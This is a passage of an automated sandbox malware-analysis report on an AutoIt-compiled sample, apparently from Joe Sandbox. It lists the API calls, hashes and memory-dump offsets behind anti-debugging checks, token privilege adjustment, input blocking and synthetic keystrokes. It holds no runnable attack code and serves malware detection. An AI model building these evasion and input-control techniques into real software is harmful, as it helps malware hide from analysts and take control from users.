                                                                                                                                                                                                                                                                            • Instruction ID: 93749c6c85e23a5c8978e95078bdcc0b149878791892225127b9984a27a98e81
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec6feabd6b6315639cbe12f49765a47d7e7b5be8bf285414e51d113eae27ff59
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5EF0A03081091067D61477B8AC0D9AE77ADAE02336B504701FC36C20F0D7789E99879D
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                            • Opcode ID: 606a9725db3d9f51af6bb27489b7c20d51da33bcb7941b5b88c8d4fb0b58808b
                                                                                                                                                                                                                                                                            • Instruction ID: 7bb281e88c84c1238076e8433a8b5d100d98c67229f0a50f0148e6fedf1e2edc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606a9725db3d9f51af6bb27489b7c20d51da33bcb7941b5b88c8d4fb0b58808b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FD012B1C0810CE6CBD096D19C48DFD737CBB18700F164866F90691040E6209948E725
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00C22A8A
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00C22A94
                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00C22AA1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1bb009f4970c0bed6848a5fc3c218581053970cbf4147dbb239ee162c1869b61
                                                                                                                                                                                                                                                                            • Instruction ID: 8304d32aa60878ded689fdc59a1151a55b8f8a36d6116fca7ee3bd9e7939c8ac
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bb009f4970c0bed6848a5fc3c218581053970cbf4147dbb239ee162c1869b61
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9831D77490122CABCB21DF64D9887DCBBB4AF18310F5041DAE41CA6260E7709FC59F45
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C109D8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C1014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00C109F5
                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5205A
                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C52087
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C52097
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 577356006-0
                                                                                                                                                                                                                                                                            • Opcode ID: c5456213680218d8d7ac5b4ab07555a8fc24bedc7e141880a9c9c7158e9f8e8f
                                                                                                                                                                                                                                                                            • Instruction ID: c2cf4f6066ec2b2b8eddc721b82cbb26846ca8dbba7c9ae3ec0189f108a676e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5456213680218d8d7ac5b4ab07555a8fc24bedc7e141880a9c9c7158e9f8e8f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13119DB2400204AFD718AF54ECC6E6FBBF8EB45711B20841EE45697291DB70AC85CB68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00C1502E,?,00CB98D8,0000000C,00C15185,?,00000002,00000000), ref: 00C15079
                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00C1502E,?,00CB98D8,0000000C,00C15185,?,00000002,00000000), ref: 00C15080
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00C15092
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5957239dc9dc991a64352a81fe7fccb6c1eb3ad1dc3452dfa073bc42c546807a
                                                                                                                                                                                                                                                                            • Instruction ID: 8e60b8dedcbf571d33e6c6281d2875e8a07b6a9ad476630e1c8505ed8b6ffd90
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5957239dc9dc991a64352a81fe7fccb6c1eb3ad1dc3452dfa073bc42c546807a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAE01231400648AFCB216F90DD08B983B69AB96381B004014F80A8A171DB35AA92EB84
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00C5ED04
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: mouse_event
                                                                                                                                                                                                                                                                            • String ID: DOWN
                                                                                                                                                                                                                                                                            • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                                                            • Opcode ID: 2cdf481b8f8bbea7009cb3e658276235303deb07ef829ddf2b3bfae9a2a0f710
                                                                                                                                                                                                                                                                            • Instruction ID: 718c627ad8d0e8c6b2c1dea546bed4a4ccb80496011b2e6fc4deb1b2507eecd7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cdf481b8f8bbea7009cb3e658276235303deb07ef829ddf2b3bfae9a2a0f710
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20E086691DD72178FD4C2114BC07EF7034C8F12735B110156FC10D80C0ED505EC661AD
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00C4E664
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                                            • String ID: X64
                                                                                                                                                                                                                                                                            • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                            • Opcode ID: 30d06ccbc0eed2bb8b174d3b42297a40dafca58c522c422347a2929881f437d1
                                                                                                                                                                                                                                                                            • Instruction ID: 73f94ad7df3ed3eb91d3aa2b170e430a87be029b5a265bb15935e273713299fe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30d06ccbc0eed2bb8b174d3b42297a40dafca58c522c422347a2929881f437d1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14D0C9B480511DEACF80CB90EC88EDD777CBB04304F110A51F106A2040D73095488B24
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C752EE,?,?,00000035,?), ref: 00C64229
                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C752EE,?,?,00000035,?), ref: 00C64239
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6088c87e17a1305d09ed9a95fa623cba13d94bdb21707c4d38f8f2922e946c14
                                                                                                                                                                                                                                                                            • Instruction ID: eef5c4213bc20979c699d0704488ca116ab590a7abcdfe878014b2fad7ae86e1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6088c87e17a1305d09ed9a95fa623cba13d94bdb21707c4d38f8f2922e946c14
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BF0A0706002286AEB2416A6AC4DFEB376EEF85761F100165B605D3185D9609A4087B0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C5BC24
                                                                                                                                                                                                                                                                            • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00C5BC37
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                            • Opcode ID: cf443675115b993e4b36a894f1055d49826afc85926f421968865ef10dd310ee
                                                                                                                                                                                                                                                                            • Instruction ID: 3e8dcf192d6775d296caa2d840ea26390deddec583126caa55aba9f3b9b523a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf443675115b993e4b36a894f1055d49826afc85926f421968865ef10dd310ee
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24F0907480024DABDB019FA0C806BFEBFB0FF04309F00800AF951A5191C3798605DF98
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C51B48), ref: 00C51A20
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00C51B48), ref: 00C51A35
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 81990902-0
                                                                                                                                                                                                                                                                            • Opcode ID: 125c81ad9aebb00ce33cf7d504d80e9d00c4617007e2cec4b8b02c532750d343
                                                                                                                                                                                                                                                                            • Instruction ID: c0165a8652262a4aa5e4be6478ce4b999026b028263060f323b266119f1b947d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 125c81ad9aebb00ce33cf7d504d80e9d00c4617007e2cec4b8b02c532750d343
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02E09A72014610BEE7252B50FC09FBA77A9EB04321F24891EB9A6854B0DBA26CD1EB54
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 00C6F51A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                            • Opcode ID: 52c5cd117d23f3ed6869785b370b1a8eb9b9ca27df79bd840723f21514835408
                                                                                                                                                                                                                                                                            • Instruction ID: 17544c7ff245f8ba0b1ced210b6b7a0ba7c13d10266928cd6547d07ac7332d1b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52c5cd117d23f3ed6869785b370b1a8eb9b9ca27df79bd840723f21514835408
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95E048312002095FC710DF69E444A5AF7D8AFA4761F008469F94AC7351D670FD458B95
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00C1075E), ref: 00C10D4A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1e85761a706778d1c429918bea8370d6ed6c2adc018fcbbb48af4169bfef9559
                                                                                                                                                                                                                                                                            • Instruction ID: 2241e2825aa252b46e0db62a70c684f2e0024da2cd2d91df62739064b501383c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e85761a706778d1c429918bea8370d6ed6c2adc018fcbbb48af4169bfef9559
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C7358D
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00C735A0
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32 ref: 00C735AF
                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00C735CA
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C735D1
                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C73700
                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C7370E
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C73755
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00C73761
                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C7379D
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C737BF
                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C737D2
                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C737DD
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C737E6
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C737F5
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C737FE
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C73805
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C73810
                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C73822
                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C90C04,00000000), ref: 00C73838
                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00C73848
                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C7386E
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C7388D
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C738AF
                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C73A9C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                            • Opcode ID: 7df538ea3b10036f2ff7e2614cc5b8c85eb12b2146d28fddf3662656ac383f53
                                                                                                                                                                                                                                                                            • Instruction ID: da3972eb9f9c6fa8a347bf254e03fa99c9e78d0bd10d099582b7734efd4f255b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7df538ea3b10036f2ff7e2614cc5b8c85eb12b2146d28fddf3662656ac383f53
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9026C71500209AFDB14DF64CD89FAE7BB9FB48310F048558F91AAB2A0DB74EE05DB64
                                                                                                                                                                                                                                                                            APIs
